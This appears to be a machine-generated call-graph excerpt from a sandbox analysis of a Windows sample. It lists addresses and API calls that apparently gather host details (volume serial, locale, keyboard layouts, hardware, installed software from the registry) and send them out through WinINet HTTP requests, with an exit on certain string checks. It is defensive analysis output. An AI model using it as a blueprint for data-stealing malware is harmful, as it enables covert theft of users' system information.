14700->14709 14702 86a820 2 API calls 14701->14702 14703 865a43 14702->14703 14704 86a820 2 API calls 14703->14704 14705 865a52 14704->14705 14707 851670 lstrcpy 14705->14707 14706 86578a StrCmpCA 14706->14711 14707->14709 14708 851590 lstrcpy 14708->14711 14709->13765 14710 86593f StrCmpCA 14710->14711 14711->14673 14711->14674 14711->14675 14711->14676 14711->14681 14711->14689 14711->14690 14711->14692 14711->14697 
14711->14706 14711->14708 14711->14710 14712 86a8a0 lstrcpy 14711->14712 14712->14711 14714 867553 GetVolumeInformationA 14713->14714 14715 86754c 14713->14715 14716 867591 14714->14716 14715->14714 14717 8675fc GetProcessHeap RtlAllocateHeap 14716->14717 14718 867628 wsprintfA 14717->14718 14719 867619 14717->14719 14720 86a740 lstrcpy 14718->14720 14721 86a740 lstrcpy 14719->14721 14722 865da7 14720->14722 14721->14722 14722->13786 14724 86a7a0 lstrcpy 14723->14724 14725 854899 14724->14725 15776 8547b0 14725->15776 14727 8548a5 14728 86a740 lstrcpy 14727->14728 14729 8548d7 14728->14729 14730 86a740 lstrcpy 14729->14730 14731 8548e4 14730->14731 14732 86a740 lstrcpy 14731->14732 14733 8548f1 14732->14733 14734 86a740 lstrcpy 14733->14734 14735 8548fe 14734->14735 14736 86a740 lstrcpy 14735->14736 14737 85490b InternetOpenA StrCmpCA 14736->14737 14738 854944 14737->14738 14739 854955 14738->14739 14740 854ecb InternetCloseHandle 14738->14740 15787 868b60 14739->15787 14741 854ee8 14740->14741 15782 859ac0 CryptStringToBinaryA 14741->15782 14743 854963 15795 86a920 14743->15795 14746 854976 14748 86a8a0 lstrcpy 14746->14748 14753 85497f 14748->14753 14749 86a820 2 API calls 14750 854f05 14749->14750 14752 86a9b0 4 API calls 14750->14752 14751 854f27 ctype 14755 86a7a0 lstrcpy 14751->14755 14754 854f1b 14752->14754 14757 86a9b0 4 API calls 14753->14757 14756 86a8a0 lstrcpy 14754->14756 14768 854f57 14755->14768 14756->14751 14758 8549a9 14757->14758 14759 86a8a0 lstrcpy 14758->14759 14760 8549b2 14759->14760 14761 86a9b0 4 API calls 14760->14761 14762 8549d1 14761->14762 14763 86a8a0 lstrcpy 14762->14763 14764 8549da 14763->14764 14765 86a920 3 API calls 14764->14765 14766 8549f8 14765->14766 14767 86a8a0 lstrcpy 14766->14767 14769 854a01 14767->14769 14768->13789 14770 86a9b0 4 API calls 14769->14770 14771 854a20 14770->14771 14772 86a8a0 lstrcpy 14771->14772 14773 854a29 14772->14773 14774 86a9b0 4 API calls 14773->14774 14775 854a48 14774->14775 14776 86a8a0 
lstrcpy 14775->14776 14777 854a51 14776->14777 14778 86a9b0 4 API calls 14777->14778 14779 854a7d 14778->14779 14780 86a920 3 API calls 14779->14780 14781 854a84 14780->14781 14782 86a8a0 lstrcpy 14781->14782 14783 854a8d 14782->14783 14784 854aa3 InternetConnectA 14783->14784 14784->14740 14785 854ad3 HttpOpenRequestA 14784->14785 14787 854ebe InternetCloseHandle 14785->14787 14788 854b28 14785->14788 14787->14740 14789 86a9b0 4 API calls 14788->14789 14790 854b3c 14789->14790 14791 86a8a0 lstrcpy 14790->14791 14792 854b45 14791->14792 14793 86a920 3 API calls 14792->14793 14794 854b63 14793->14794 14795 86a8a0 lstrcpy 14794->14795 14796 854b6c 14795->14796 14797 86a9b0 4 API calls 14796->14797 14798 854b8b 14797->14798 14799 86a8a0 lstrcpy 14798->14799 14800 854b94 14799->14800 14801 86a9b0 4 API calls 14800->14801 14802 854bb5 14801->14802 14803 86a8a0 lstrcpy 14802->14803 14804 854bbe 14803->14804 14805 86a9b0 4 API calls 14804->14805 14806 854bde 14805->14806 14807 86a8a0 lstrcpy 14806->14807 14808 854be7 14807->14808 14809 86a9b0 4 API calls 14808->14809 14810 854c06 14809->14810 14811 86a8a0 lstrcpy 14810->14811 14812 854c0f 14811->14812 14813 86a920 3 API calls 14812->14813 14814 854c2d 14813->14814 14815 86a8a0 lstrcpy 14814->14815 14816 854c36 14815->14816 14817 86a9b0 4 API calls 14816->14817 14818 854c55 14817->14818 14819 86a8a0 lstrcpy 14818->14819 14820 854c5e 14819->14820 14821 86a9b0 4 API calls 14820->14821 14822 854c7d 14821->14822 14823 86a8a0 lstrcpy 14822->14823 14824 854c86 14823->14824 14825 86a920 3 API calls 14824->14825 14826 854ca4 14825->14826 14827 86a8a0 lstrcpy 14826->14827 14828 854cad 14827->14828 14829 86a9b0 4 API calls 14828->14829 14830 854ccc 14829->14830 14831 86a8a0 lstrcpy 14830->14831 14832 854cd5 14831->14832 14833 86a9b0 4 API calls 14832->14833 14834 854cf6 14833->14834 14835 86a8a0 lstrcpy 14834->14835 14836 854cff 14835->14836 14837 86a9b0 4 API calls 14836->14837 14838 854d1f 14837->14838 14839 86a8a0 lstrcpy 
14838->14839 14840 854d28 14839->14840 14841 86a9b0 4 API calls 14840->14841 14842 854d47 14841->14842 14843 86a8a0 lstrcpy 14842->14843 14844 854d50 14843->14844 14845 86a920 3 API calls 14844->14845 14846 854d6e 14845->14846 14847 86a8a0 lstrcpy 14846->14847 14848 854d77 14847->14848 14849 86a740 lstrcpy 14848->14849 14850 854d92 14849->14850 14851 86a920 3 API calls 14850->14851 14852 854db3 14851->14852 14853 86a920 3 API calls 14852->14853 14854 854dba 14853->14854 14855 86a8a0 lstrcpy 14854->14855 14856 854dc6 14855->14856 14857 854de7 lstrlen 14856->14857 14858 854dfa 14857->14858 14859 854e03 lstrlen 14858->14859 15801 86aad0 14859->15801 14861 854e13 HttpSendRequestA 14862 854e32 InternetReadFile 14861->14862 14863 854e67 InternetCloseHandle 14862->14863 14868 854e5e 14862->14868 14866 86a800 14863->14866 14865 86a9b0 4 API calls 14865->14868 14866->14787 14867 86a8a0 lstrcpy 14867->14868 14868->14862 14868->14863 14868->14865 14868->14867 15803 86aad0 14869->15803 14871 8617c4 StrCmpCA 14872 8617cf ExitProcess 14871->14872 14873 8617d7 14871->14873 14874 8619c2 14873->14874 14875 8618cf StrCmpCA 14873->14875 14876 8618ad StrCmpCA 14873->14876 14877 861932 StrCmpCA 14873->14877 14878 861913 StrCmpCA 14873->14878 14879 861970 StrCmpCA 14873->14879 14880 8618f1 StrCmpCA 14873->14880 14881 861951 StrCmpCA 14873->14881 14882 86187f StrCmpCA 14873->14882 14883 86185d StrCmpCA 14873->14883 14884 86a820 lstrlen lstrcpy 14873->14884 14874->13791 14875->14873 14876->14873 14877->14873 14878->14873 14879->14873 14880->14873 14881->14873 14882->14873 14883->14873 14884->14873 14886 86a7a0 lstrcpy 14885->14886 14887 855979 14886->14887 14888 8547b0 2 API calls 14887->14888 14889 855985 14888->14889 14890 86a740 lstrcpy 14889->14890 14891 8559ba 14890->14891 14892 86a740 lstrcpy 14891->14892 14893 8559c7 14892->14893 14894 86a740 lstrcpy 14893->14894 14895 8559d4 14894->14895 14896 86a740 lstrcpy 14895->14896 14897 8559e1 14896->14897 14898 86a740 lstrcpy 14897->14898 
14899 8559ee InternetOpenA StrCmpCA 14898->14899 14900 855a1d 14899->14900 14901 855fc3 InternetCloseHandle 14900->14901 14903 868b60 3 API calls 14900->14903 14902 855fe0 14901->14902 14906 859ac0 4 API calls 14902->14906 14904 855a3c 14903->14904 14905 86a920 3 API calls 14904->14905 14907 855a4f 14905->14907 14908 855fe6 14906->14908 14909 86a8a0 lstrcpy 14907->14909 14910 86a820 2 API calls 14908->14910 14912 85601f ctype 14908->14912 14914 855a58 14909->14914 14911 855ffd 14910->14911 14913 86a9b0 4 API calls 14911->14913 14916 86a7a0 lstrcpy 14912->14916 14915 856013 14913->14915 14918 86a9b0 4 API calls 14914->14918 14917 86a8a0 lstrcpy 14915->14917 14926 85604f 14916->14926 14917->14912 14919 855a82 14918->14919 14920 86a8a0 lstrcpy 14919->14920 14921 855a8b 14920->14921 14922 86a9b0 4 API calls 14921->14922 14923 855aaa 14922->14923 14924 86a8a0 lstrcpy 14923->14924 14925 855ab3 14924->14925 14927 86a920 3 API calls 14925->14927 14926->13797 14928 855ad1 14927->14928 14929 86a8a0 lstrcpy 14928->14929 14930 855ada 14929->14930 14931 86a9b0 4 API calls 14930->14931 14932 855af9 14931->14932 14933 86a8a0 lstrcpy 14932->14933 14934 855b02 14933->14934 14935 86a9b0 4 API calls 14934->14935 14936 855b21 14935->14936 14937 86a8a0 lstrcpy 14936->14937 14938 855b2a 14937->14938 14939 86a9b0 4 API calls 14938->14939 14940 855b56 14939->14940 14941 86a920 3 API calls 14940->14941 14942 855b5d 14941->14942 14943 86a8a0 lstrcpy 14942->14943 14944 855b66 14943->14944 14945 855b7c InternetConnectA 14944->14945 14945->14901 14946 855bac HttpOpenRequestA 14945->14946 14948 855fb6 InternetCloseHandle 14946->14948 14949 855c0b 14946->14949 14948->14901 14950 86a9b0 4 API calls 14949->14950 14951 855c1f 14950->14951 14952 86a8a0 lstrcpy 14951->14952 14953 855c28 14952->14953 14954 86a920 3 API calls 14953->14954 14955 855c46 14954->14955 14956 86a8a0 lstrcpy 14955->14956 14957 855c4f 14956->14957 14958 86a9b0 4 API calls 14957->14958 14959 855c6e 14958->14959 14960 86a8a0 
lstrcpy 14959->14960 14961 855c77 14960->14961 14962 86a9b0 4 API calls 14961->14962 14963 855c98 14962->14963 14964 86a8a0 lstrcpy 14963->14964 14965 855ca1 14964->14965 14966 86a9b0 4 API calls 14965->14966 14967 855cc1 14966->14967 14968 86a8a0 lstrcpy 14967->14968 14969 855cca 14968->14969 14970 86a9b0 4 API calls 14969->14970 14971 855ce9 14970->14971 14972 86a8a0 lstrcpy 14971->14972 14973 855cf2 14972->14973 14974 86a920 3 API calls 14973->14974 14975 855d10 14974->14975 14976 86a8a0 lstrcpy 14975->14976 14977 855d19 14976->14977 14978 86a9b0 4 API calls 14977->14978 14979 855d38 14978->14979 14980 86a8a0 lstrcpy 14979->14980 14981 855d41 14980->14981 14982 86a9b0 4 API calls 14981->14982 14983 855d60 14982->14983 14984 86a8a0 lstrcpy 14983->14984 14985 855d69 14984->14985 14986 86a920 3 API calls 14985->14986 14987 855d87 14986->14987 14988 86a8a0 lstrcpy 14987->14988 14989 855d90 14988->14989 14990 86a9b0 4 API calls 14989->14990 14991 855daf 14990->14991 14992 86a8a0 lstrcpy 14991->14992 14993 855db8 14992->14993 14994 86a9b0 4 API calls 14993->14994 14995 855dd9 14994->14995 14996 86a8a0 lstrcpy 14995->14996 14997 855de2 14996->14997 14998 86a9b0 4 API calls 14997->14998 14999 855e02 14998->14999 15000 86a8a0 lstrcpy 14999->15000 15001 855e0b 15000->15001 15002 86a9b0 4 API calls 15001->15002 15003 855e2a 15002->15003 15004 86a8a0 lstrcpy 15003->15004 15005 855e33 15004->15005 15006 86a920 3 API calls 15005->15006 15007 855e54 15006->15007 15008 86a8a0 lstrcpy 15007->15008 15009 855e5d 15008->15009 15010 855e70 lstrlen 15009->15010 15804 86aad0 15010->15804 15012 855e81 lstrlen GetProcessHeap RtlAllocateHeap 15805 86aad0 15012->15805 15014 855eae lstrlen 15015 855ebe 15014->15015 15016 855ed7 lstrlen 15015->15016 15017 855ee7 15016->15017 15018 855ef0 lstrlen 15017->15018 15019 855f04 15018->15019 15020 855f1a lstrlen 15019->15020 15806 86aad0 15020->15806 15022 855f2a HttpSendRequestA 15023 855f35 InternetReadFile 15022->15023 15024 855f6a 
InternetCloseHandle 15023->15024 15028 855f61 15023->15028 15024->14948 15026 86a9b0 4 API calls 15026->15028 15027 86a8a0 lstrcpy 15027->15028 15028->15023 15028->15024 15028->15026 15028->15027 15031 861077 15029->15031 15030 861151 15030->13799 15031->15030 15032 86a820 lstrlen lstrcpy 15031->15032 15032->15031 15034 860db7 15033->15034 15035 860f17 15034->15035 15036 860e27 StrCmpCA 15034->15036 15037 860e67 StrCmpCA 15034->15037 15038 860ea4 StrCmpCA 15034->15038 15039 86a820 lstrlen lstrcpy 15034->15039 15035->13807 15036->15034 15037->15034 15038->15034 15039->15034 15044 860f67 15040->15044 15041 861044 15041->13815 15042 860fb2 StrCmpCA 15042->15044 15043 86a820 lstrlen lstrcpy 15043->15044 15044->15041 15044->15042 15044->15043 15046 86a740 lstrcpy 15045->15046 15047 861a26 15046->15047 15048 86a9b0 4 API calls 15047->15048 15049 861a37 15048->15049 15050 86a8a0 lstrcpy 15049->15050 15051 861a40 15050->15051 15052 86a9b0 4 API calls 15051->15052 15053 861a5b 15052->15053 15054 86a8a0 lstrcpy 15053->15054 15055 861a64 15054->15055 15056 86a9b0 4 API calls 15055->15056 15057 861a7d 15056->15057 15058 86a8a0 lstrcpy 15057->15058 15059 861a86 15058->15059 15060 86a9b0 4 API calls 15059->15060 15061 861aa1 15060->15061 15062 86a8a0 lstrcpy 15061->15062 15063 861aaa 15062->15063 15064 86a9b0 4 API calls 15063->15064 15065 861ac3 15064->15065 15066 86a8a0 lstrcpy 15065->15066 15067 861acc 15066->15067 15068 86a9b0 4 API calls 15067->15068 15069 861ae7 15068->15069 15070 86a8a0 lstrcpy 15069->15070 15071 861af0 15070->15071 15072 86a9b0 4 API calls 15071->15072 15073 861b09 15072->15073 15074 86a8a0 lstrcpy 15073->15074 15075 861b12 15074->15075 15076 86a9b0 4 API calls 15075->15076 15077 861b2d 15076->15077 15078 86a8a0 lstrcpy 15077->15078 15079 861b36 15078->15079 15080 86a9b0 4 API calls 15079->15080 15081 861b4f 15080->15081 15082 86a8a0 lstrcpy 15081->15082 15083 861b58 15082->15083 15084 86a9b0 4 API calls 15083->15084 15085 861b76 15084->15085 15086 
86a8a0 lstrcpy 15085->15086 15087 861b7f 15086->15087 15088 867500 6 API calls 15087->15088 15089 861b96 15088->15089 15090 86a920 3 API calls 15089->15090 15091 861ba9 15090->15091 15092 86a8a0 lstrcpy 15091->15092 15093 861bb2 15092->15093 15094 86a9b0 4 API calls 15093->15094 15095 861bdc 15094->15095 15096 86a8a0 lstrcpy 15095->15096 15097 861be5 15096->15097 15098 86a9b0 4 API calls 15097->15098 15099 861c05 15098->15099 15100 86a8a0 lstrcpy 15099->15100 15101 861c0e 15100->15101 15807 867690 GetProcessHeap RtlAllocateHeap 15101->15807 15104 86a9b0 4 API calls 15105 861c2e 15104->15105 15106 86a8a0 lstrcpy 15105->15106 15107 861c37 15106->15107 15108 86a9b0 4 API calls 15107->15108 15109 861c56 15108->15109 15110 86a8a0 lstrcpy 15109->15110 15111 861c5f 15110->15111 15112 86a9b0 4 API calls 15111->15112 15113 861c80 15112->15113 15114 86a8a0 lstrcpy 15113->15114 15115 861c89 15114->15115 15814 8677c0 GetCurrentProcess IsWow64Process 15115->15814 15118 86a9b0 4 API calls 15119 861ca9 15118->15119 15120 86a8a0 lstrcpy 15119->15120 15121 861cb2 15120->15121 15122 86a9b0 4 API calls 15121->15122 15123 861cd1 15122->15123 15124 86a8a0 lstrcpy 15123->15124 15125 861cda 15124->15125 15126 86a9b0 4 API calls 15125->15126 15127 861cfb 15126->15127 15128 86a8a0 lstrcpy 15127->15128 15129 861d04 15128->15129 15130 867850 3 API calls 15129->15130 15131 861d14 15130->15131 15132 86a9b0 4 API calls 15131->15132 15133 861d24 15132->15133 15134 86a8a0 lstrcpy 15133->15134 15135 861d2d 15134->15135 15136 86a9b0 4 API calls 15135->15136 15137 861d4c 15136->15137 15138 86a8a0 lstrcpy 15137->15138 15139 861d55 15138->15139 15140 86a9b0 4 API calls 15139->15140 15141 861d75 15140->15141 15142 86a8a0 lstrcpy 15141->15142 15143 861d7e 15142->15143 15144 8678e0 3 API calls 15143->15144 15145 861d8e 15144->15145 15146 86a9b0 4 API calls 15145->15146 15147 861d9e 15146->15147 15148 86a8a0 lstrcpy 15147->15148 15149 861da7 15148->15149 15150 86a9b0 4 API calls 15149->15150 15151 861dc6 
15150->15151 15152 86a8a0 lstrcpy 15151->15152 15153 861dcf 15152->15153 15154 86a9b0 4 API calls 15153->15154 15155 861df0 15154->15155 15156 86a8a0 lstrcpy 15155->15156 15157 861df9 15156->15157 15816 867980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15157->15816 15160 86a9b0 4 API calls 15161 861e19 15160->15161 15162 86a8a0 lstrcpy 15161->15162 15163 861e22 15162->15163 15164 86a9b0 4 API calls 15163->15164 15165 861e41 15164->15165 15166 86a8a0 lstrcpy 15165->15166 15167 861e4a 15166->15167 15168 86a9b0 4 API calls 15167->15168 15169 861e6b 15168->15169 15170 86a8a0 lstrcpy 15169->15170 15171 861e74 15170->15171 15818 867a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15171->15818 15174 86a9b0 4 API calls 15175 861e94 15174->15175 15176 86a8a0 lstrcpy 15175->15176 15177 861e9d 15176->15177 15178 86a9b0 4 API calls 15177->15178 15179 861ebc 15178->15179 15180 86a8a0 lstrcpy 15179->15180 15181 861ec5 15180->15181 15182 86a9b0 4 API calls 15181->15182 15183 861ee5 15182->15183 15184 86a8a0 lstrcpy 15183->15184 15185 861eee 15184->15185 15821 867b00 GetUserDefaultLocaleName 15185->15821 15188 86a9b0 4 API calls 15189 861f0e 15188->15189 15190 86a8a0 lstrcpy 15189->15190 15191 861f17 15190->15191 15192 86a9b0 4 API calls 15191->15192 15193 861f36 15192->15193 15194 86a8a0 lstrcpy 15193->15194 15195 861f3f 15194->15195 15196 86a9b0 4 API calls 15195->15196 15197 861f60 15196->15197 15198 86a8a0 lstrcpy 15197->15198 15199 861f69 15198->15199 15825 867b90 15199->15825 15201 861f80 15202 86a920 3 API calls 15201->15202 15203 861f93 15202->15203 15204 86a8a0 lstrcpy 15203->15204 15205 861f9c 15204->15205 15206 86a9b0 4 API calls 15205->15206 15207 861fc6 15206->15207 15208 86a8a0 lstrcpy 15207->15208 15209 861fcf 15208->15209 15210 86a9b0 4 API calls 15209->15210 15211 861fef 15210->15211 15212 86a8a0 lstrcpy 15211->15212 15213 861ff8 15212->15213 15837 867d80 GetSystemPowerStatus 15213->15837 15216 86a9b0 4 API calls 15217 862018 15216->15217 15218 
86a8a0 lstrcpy 15217->15218 15219 862021 15218->15219 15220 86a9b0 4 API calls 15219->15220 15221 862040 15220->15221 15222 86a8a0 lstrcpy 15221->15222 15223 862049 15222->15223 15224 86a9b0 4 API calls 15223->15224 15225 86206a 15224->15225 15226 86a8a0 lstrcpy 15225->15226 15227 862073 15226->15227 15228 86207e GetCurrentProcessId 15227->15228 15839 869470 OpenProcess 15228->15839 15231 86a920 3 API calls 15232 8620a4 15231->15232 15233 86a8a0 lstrcpy 15232->15233 15234 8620ad 15233->15234 15235 86a9b0 4 API calls 15234->15235 15236 8620d7 15235->15236 15237 86a8a0 lstrcpy 15236->15237 15238 8620e0 15237->15238 15239 86a9b0 4 API calls 15238->15239 15240 862100 15239->15240 15241 86a8a0 lstrcpy 15240->15241 15242 862109 15241->15242 15844 867e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15242->15844 15245 86a9b0 4 API calls 15246 862129 15245->15246 15247 86a8a0 lstrcpy 15246->15247 15248 862132 15247->15248 15249 86a9b0 4 API calls 15248->15249 15250 862151 15249->15250 15251 86a8a0 lstrcpy 15250->15251 15252 86215a 15251->15252 15253 86a9b0 4 API calls 15252->15253 15254 86217b 15253->15254 15255 86a8a0 lstrcpy 15254->15255 15256 862184 15255->15256 15848 867f60 15256->15848 15259 86a9b0 4 API calls 15260 8621a4 15259->15260 15261 86a8a0 lstrcpy 15260->15261 15262 8621ad 15261->15262 15263 86a9b0 4 API calls 15262->15263 15264 8621cc 15263->15264 15265 86a8a0 lstrcpy 15264->15265 15266 8621d5 15265->15266 15267 86a9b0 4 API calls 15266->15267 15268 8621f6 15267->15268 15269 86a8a0 lstrcpy 15268->15269 15270 8621ff 15269->15270 15861 867ed0 GetSystemInfo wsprintfA 15270->15861 15273 86a9b0 4 API calls 15274 86221f 15273->15274 15275 86a8a0 lstrcpy 15274->15275 15276 862228 15275->15276 15277 86a9b0 4 API calls 15276->15277 15278 862247 15277->15278 15279 86a8a0 lstrcpy 15278->15279 15280 862250 15279->15280 15281 86a9b0 4 API calls 15280->15281 15282 862270 15281->15282 15283 86a8a0 lstrcpy 15282->15283 15284 862279 15283->15284 15863 868100 GetProcessHeap 
RtlAllocateHeap 15284->15863 15287 86a9b0 4 API calls 15288 862299 15287->15288 15289 86a8a0 lstrcpy 15288->15289 15290 8622a2 15289->15290 15291 86a9b0 4 API calls 15290->15291 15292 8622c1 15291->15292 15293 86a8a0 lstrcpy 15292->15293 15294 8622ca 15293->15294 15295 86a9b0 4 API calls 15294->15295 15296 8622eb 15295->15296 15297 86a8a0 lstrcpy 15296->15297 15298 8622f4 15297->15298 15869 8687c0 15298->15869 15301 86a920 3 API calls 15302 86231e 15301->15302 15303 86a8a0 lstrcpy 15302->15303 15304 862327 15303->15304 15305 86a9b0 4 API calls 15304->15305 15306 862351 15305->15306 15307 86a8a0 lstrcpy 15306->15307 15308 86235a 15307->15308 15309 86a9b0 4 API calls 15308->15309 15310 86237a 15309->15310 15311 86a8a0 lstrcpy 15310->15311 15312 862383 15311->15312 15313 86a9b0 4 API calls 15312->15313 15314 8623a2 15313->15314 15315 86a8a0 lstrcpy 15314->15315 15316 8623ab 15315->15316 15874 8681f0 15316->15874 15318 8623c2 15319 86a920 3 API calls 15318->15319 15320 8623d5 15319->15320 15321 86a8a0 lstrcpy 15320->15321 15322 8623de 15321->15322 15323 86a9b0 4 API calls 15322->15323 15324 86240a 15323->15324 15325 86a8a0 lstrcpy 15324->15325 15326 862413 15325->15326 15327 86a9b0 4 API calls 15326->15327 15328 862432 15327->15328 15329 86a8a0 lstrcpy 15328->15329 15330 86243b 15329->15330 15331 86a9b0 4 API calls 15330->15331 15332 86245c 15331->15332 15333 86a8a0 lstrcpy 15332->15333 15334 862465 15333->15334 15335 86a9b0 4 API calls 15334->15335 15336 862484 15335->15336 15337 86a8a0 lstrcpy 15336->15337 15338 86248d 15337->15338 15339 86a9b0 4 API calls 15338->15339 15340 8624ae 15339->15340 15341 86a8a0 lstrcpy 15340->15341 15342 8624b7 15341->15342 15882 868320 15342->15882 15344 8624d3 15345 86a920 3 API calls 15344->15345 15346 8624e6 15345->15346 15347 86a8a0 lstrcpy 15346->15347 15348 8624ef 15347->15348 15349 86a9b0 4 API calls 15348->15349 15350 862519 15349->15350 15351 86a8a0 lstrcpy 15350->15351 15352 862522 15351->15352 15353 86a9b0 4 API calls 
15352->15353 15354 862543 15353->15354 15355 86a8a0 lstrcpy 15354->15355 15356 86254c 15355->15356 15357 868320 17 API calls 15356->15357 15358 862568 15357->15358 15359 86a920 3 API calls 15358->15359 15360 86257b 15359->15360 15361 86a8a0 lstrcpy 15360->15361 15362 862584 15361->15362 15363 86a9b0 4 API calls 15362->15363 15364 8625ae 15363->15364 15365 86a8a0 lstrcpy 15364->15365 15366 8625b7 15365->15366 15367 86a9b0 4 API calls 15366->15367 15368 8625d6 15367->15368 15369 86a8a0 lstrcpy 15368->15369 15370 8625df 15369->15370 15371 86a9b0 4 API calls 15370->15371 15372 862600 15371->15372 15373 86a8a0 lstrcpy 15372->15373 15374 862609 15373->15374 15918 868680 15374->15918 15376 862620 15377 86a920 3 API calls 15376->15377 15378 862633 15377->15378 15379 86a8a0 lstrcpy 15378->15379 15380 86263c 15379->15380 15381 86265a lstrlen 15380->15381 15382 86266a 15381->15382 15383 86a740 lstrcpy 15382->15383 15384 86267c 15383->15384 15385 851590 lstrcpy 15384->15385 15386 86268d 15385->15386 15928 865190 15386->15928 15388 862699 15388->13819 16116 86aad0 15389->16116 15391 855009 InternetOpenUrlA 15395 855021 15391->15395 15392 8550a0 InternetCloseHandle InternetCloseHandle 15394 8550ec 15392->15394 15393 85502a InternetReadFile 15393->15395 15394->13823 15395->15392 15395->15393 16117 8598d0 15396->16117 15398 860759 15399 860a38 15398->15399 15401 86077d 15398->15401 15400 851590 lstrcpy 15399->15400 15402 860a49 15400->15402 15403 860799 StrCmpCA 15401->15403 16293 860250 15402->16293 15405 8607a8 15403->15405 15406 860843 15403->15406 15408 86a7a0 lstrcpy 15405->15408 15409 860865 StrCmpCA 15406->15409 15410 8607c3 15408->15410 15411 860874 15409->15411 15413 86096b 15409->15413 15412 851590 lstrcpy 15410->15412 15414 86a740 lstrcpy 15411->15414 15415 86080c 15412->15415 15416 86099c StrCmpCA 15413->15416 15417 860881 15414->15417 15418 86a7a0 lstrcpy 15415->15418 15420 860a2d 15416->15420 15421 8609ab 15416->15421 15422 86a9b0 4 API calls 15417->15422 15419 
860823 15418->15419 15423 86a7a0 lstrcpy 15419->15423 15420->13827 15424 851590 lstrcpy 15421->15424 15425 8608ac 15422->15425 15426 86083e 15423->15426 15427 8609f4 15424->15427 15428 86a920 3 API calls 15425->15428 16120 85fb00 15426->16120 15430 86a7a0 lstrcpy 15427->15430 15431 8608b3 15428->15431 15432 860a0d 15430->15432 15433 86a9b0 4 API calls 15431->15433 15435 86a7a0 lstrcpy 15432->15435 15434 8608ba 15433->15434 15437 860a28 15435->15437 15768 86a7a0 lstrcpy 15767->15768 15769 851683 15768->15769 15770 86a7a0 lstrcpy 15769->15770 15771 851695 15770->15771 15772 86a7a0 lstrcpy 15771->15772 15773 8516a7 15772->15773 15774 86a7a0 lstrcpy 15773->15774 15775 8515a3 15774->15775 15775->14650 15777 8547c6 15776->15777 15778 854838 lstrlen 15777->15778 15802 86aad0 15778->15802 15780 854848 InternetCrackUrlA 15781 854867 15780->15781 15781->14727 15783 859af9 LocalAlloc 15782->15783 15784 854eee 15782->15784 15783->15784 15785 859b14 CryptStringToBinaryA 15783->15785 15784->14749 15784->14751 15785->15784 15786 859b39 LocalFree 15785->15786 15786->15784 15788 86a740 lstrcpy 15787->15788 15789 868b74 15788->15789 15790 86a740 lstrcpy 15789->15790 15791 868b82 GetSystemTime 15790->15791 15792 868b99 15791->15792 15793 86a7a0 lstrcpy 15792->15793 15794 868bfc 15793->15794 15794->14743 15796 86a931 15795->15796 15797 86a988 15796->15797 15800 86a968 lstrcpy lstrcat 15796->15800 15798 86a7a0 lstrcpy 15797->15798 15799 86a994 15798->15799 15799->14746 15800->15797 15801->14861 15802->15780 15803->14871 15804->15012 15805->15014 15806->15022 15935 8677a0 15807->15935 15810 8676c6 RegOpenKeyExA 15812 8676e7 RegQueryValueExA 15810->15812 15813 867704 RegCloseKey 15810->15813 15811 861c1e 15811->15104 15812->15813 15813->15811 15815 861c99 15814->15815 15815->15118 15817 861e09 15816->15817 15817->15160 15819 861e84 15818->15819 15820 867a9a wsprintfA 15818->15820 15819->15174 15820->15819 15822 861efe 15821->15822 15823 867b4d 15821->15823 15822->15188 15942 868d20 
LocalAlloc CharToOemW 15823->15942 15826 86a740 lstrcpy 15825->15826 15827 867bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15826->15827 15836 867c25 15827->15836 15828 867c46 GetLocaleInfoA 15828->15836 15829 867d18 15830 867d1e LocalFree 15829->15830 15831 867d28 15829->15831 15830->15831 15833 86a7a0 lstrcpy 15831->15833 15832 86a9b0 lstrcpy lstrlen lstrcpy lstrcat 15832->15836 15835 867d37 15833->15835 15834 86a8a0 lstrcpy 15834->15836 15835->15201 15836->15828 15836->15829 15836->15832 15836->15834 15838 862008 15837->15838 15838->15216 15840 8694b5 15839->15840 15841 869493 GetModuleFileNameExA CloseHandle 15839->15841 15842 86a740 lstrcpy 15840->15842 15841->15840 15843 862091 15842->15843 15843->15231 15845 867e68 RegQueryValueExA 15844->15845 15847 862119 15844->15847 15846 867e8e RegCloseKey 15845->15846 15846->15847 15847->15245 15849 867fb9 GetLogicalProcessorInformationEx 15848->15849 15850 867fd8 GetLastError 15849->15850 15852 868029 15849->15852 15857 867fe3 15850->15857 15859 868022 15850->15859 15856 8689f0 2 API calls 15852->15856 15854 8689f0 2 API calls 15855 862194 15854->15855 15855->15259 15858 86807b 15856->15858 15857->15849 15857->15855 15943 8689f0 15857->15943 15946 868a10 GetProcessHeap RtlAllocateHeap 15857->15946 15858->15859 15860 868084 wsprintfA 15858->15860 15859->15854 15859->15855 15860->15855 15862 86220f 15861->15862 15862->15273 15864 8689b0 15863->15864 15865 86814d GlobalMemoryStatusEx 15864->15865 15868 868163 __aulldiv 15865->15868 15866 86819b wsprintfA 15867 862289 15866->15867 15867->15287 15868->15866 15870 8687fb GetProcessHeap RtlAllocateHeap wsprintfA 15869->15870 15872 86a740 lstrcpy 15870->15872 15873 86230b 15872->15873 15873->15301 15875 86a740 lstrcpy 15874->15875 15879 868229 15875->15879 15876 868263 15878 86a7a0 lstrcpy 15876->15878 15877 86a9b0 lstrcpy lstrlen lstrcpy lstrcat 15877->15879 15880 8682dc 15878->15880 15879->15876 15879->15877 15881 86a8a0 lstrcpy 15879->15881 15880->15318 
15881->15879 15883 86a740 lstrcpy 15882->15883 15884 86835c RegOpenKeyExA 15883->15884 15885 8683d0 15884->15885 15886 8683ae 15884->15886 15888 868613 RegCloseKey 15885->15888 15889 8683f8 RegEnumKeyExA 15885->15889 15887 86a7a0 lstrcpy 15886->15887 15898 8683bd 15887->15898 15890 86a7a0 lstrcpy 15888->15890 15891 86860e 15889->15891 15892 86843f wsprintfA RegOpenKeyExA 15889->15892 15890->15898 15891->15888 15893 868485 RegCloseKey RegCloseKey 15892->15893 15894 8684c1 RegQueryValueExA 15892->15894 15895 86a7a0 lstrcpy 15893->15895 15896 868601 RegCloseKey 15894->15896 15897 8684fa lstrlen 15894->15897 15895->15898 15896->15891 15897->15896 15899 868510 15897->15899 15898->15344 15900 86a9b0 4 API calls 15899->15900 15901 868527 15900->15901 15902 86a8a0 lstrcpy 15901->15902 15903 868533 15902->15903 15904 86a9b0 4 API calls 15903->15904 15905 868557 15904->15905 15906 86a8a0 lstrcpy 15905->15906 15907 868563 15906->15907 15908 86856e RegQueryValueExA 15907->15908 